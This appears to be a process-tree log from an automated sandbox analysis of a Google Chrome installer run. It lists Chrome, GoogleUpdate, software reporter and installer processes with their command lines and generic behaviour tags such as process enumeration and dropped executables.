"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1624 /prefetch:2
3⤵
PID:2376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2408 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2456 /prefetch:8
3⤵
PID:2260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2972 /prefetch:1
3⤵
PID:3040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1
3⤵
PID:3892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3988 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4396 /prefetch:8
3⤵
PID:3312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
3⤵
PID:1512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4628 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4384 /prefetch:1
3⤵
PID:2068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
3⤵
PID:4904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5660 /prefetch:8
3⤵
PID:4348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5640 /prefetch:8
3⤵
PID:4148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5156 /prefetch:8
3⤵
PID:4444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3588 /prefetch:8
3⤵
PID:1516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
3⤵
PID:5032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5804 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1684

C:\Users\Admin\Downloads\ChromeSetup.exe
"C:\Users\Admin\Downloads\ChromeSetup.exe"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2460

C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={2DD0C6D7-1F74-F8E3-22E5-46503716F79C}&lang=en&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHWL&installdataindex=empty"
4⤵
- Executes dropped EXE
- Sets file execution options in registry
- Checks computer location settings
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4328

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:2620

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:4476

C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleUpdateComRegisterShell64.exe"
6⤵
- Executes dropped EXE
- Registers COM server for autorun
- Loads dropped DLL
- Modifies registry class
PID:984

C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleUpdateComRegisterShell64.exe"
6⤵
- Executes dropped EXE
- Registers COM server for autorun
- Loads dropped DLL
- Modifies registry class
PID:4448

C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleUpdateComRegisterShell64.exe"
6⤵
- Executes dropped EXE
- Registers COM server for autorun
- Loads dropped DLL
- Modifies registry class
PID:1328

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NTMwNzE1ODUtODc5NC00QkE5LUI0OEQtMkZBMjlFM0RBRjY0fSIgdXNlcmlkPSJ7NjU0REYwNUQtMTA5Qi00ODk5LUE1MzctMDFGQTREM0E3RTQxfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0YwNkZFNEY5LURFNkYtNDVBRi05OTg2LTAzOUQyRUIxODlGN30iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iNCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjcxIiBuZXh0dmVyc2lvbj0iMS4zLjM2LjE1MiIgbGFuZz0iZW4iIGJyYW5kPSJDSFdMIiBjbGllbnQ9IiIgaWlkPSJ7MkREMEM2RDctMUY3NC1GOEUzLTIyRTUtNDY1MDM3MTZGNzlDfSI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIxNTUwIi8-PC9hcHA-PC9yZXF1ZXN0Pg
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2996

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={2DD0C6D7-1F74-F8E3-22E5-46503716F79C}&lang=en&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHWL&installdataindex=empty" /installsource taggedmi /sessionid "{53071585-8794-4BA9-B48D-2FA29E3DAF64}"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
3⤵
PID:3464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
3⤵
PID:4340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
3⤵
PID:3224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
3⤵
PID:2124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
3⤵
PID:4016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5664 /prefetch:8
3⤵
PID:1828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
3⤵
PID:5104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3000 /prefetch:8
3⤵
PID:4384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
3⤵
PID:3616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2980 /prefetch:1
3⤵
PID:4760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 /prefetch:8
3⤵
PID:4088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6268 /prefetch:8
3⤵
PID:464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5968 /prefetch:8
3⤵
PID:1796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2344 /prefetch:8
3⤵
PID:3692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5956 /prefetch:8
3⤵
PID:1192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3076 /prefetch:8
3⤵
PID:2584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6280 /prefetch:8
3⤵
PID:4824

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\107.294.200\software_reporter_tool.exe
"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\107.294.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=RZl4mB0i2fPUAyK8fTcCO/Sg3AgeTvbvV4NeIXH/ --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=Off
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768

\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=107.294.200 --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x7ff65af75960,0x7ff65af75970,0x7ff65af75980
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4504

\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_4768_KUIRQPYICRMIOLKQ" --sandboxed-process-id=2 --init-done-notifier=756 --sandbox-mojo-pipe-token=13918959793952168225 --mojo-platform-channel-handle=732 --engine=2
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4816

\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_4768_KUIRQPYICRMIOLKQ" --sandboxed-process-id=3 --init-done-notifier=984 --sandbox-mojo-pipe-token=5493131957698183701 --mojo-platform-channel-handle=980
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2104 /prefetch:2
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3792 /prefetch:8
3⤵
PID:4940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5668 /prefetch:8
3⤵
PID:2632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1
3⤵
PID:1684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
3⤵
PID:2904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3228 /prefetch:8
3⤵
PID:2304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2132 /prefetch:8
3⤵
PID:1948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3788 /prefetch:8
3⤵
PID:4960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3980 /prefetch:8
3⤵
PID:3932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:1
3⤵
PID:1360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1104 /prefetch:1
3⤵
PID:4316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1
3⤵
PID:460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,16662822581992158552,17322551858303450015,131072 --enable-features=FtpProtocol --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
3⤵
PID:4764

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1820

C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"
1⤵
- Drops file in Program Files directory
PID:4004

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4004_1694836645\ChromeRecovery.exe
"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4004_1694836645\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={6c3ea363-8a86-415f-b760-16eee81cfe04} --system
2⤵
- Executes dropped EXE
PID:600

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1796

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:1608

C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\108.0.5359.125_chrome_installer.exe
"C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\108.0.5359.125_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\guiBDB5.tmp"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:2688

C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\CR_28228.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\CR_28228.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\CR_28228.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\guiBDB5.tmp"
3⤵
- Executes dropped EXE
- Modifies Installed Components in the registry
- Registers COM server for autorun
- Drops file in Program Files directory
PID:876

C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\CR_28228.tmp\setup.exe
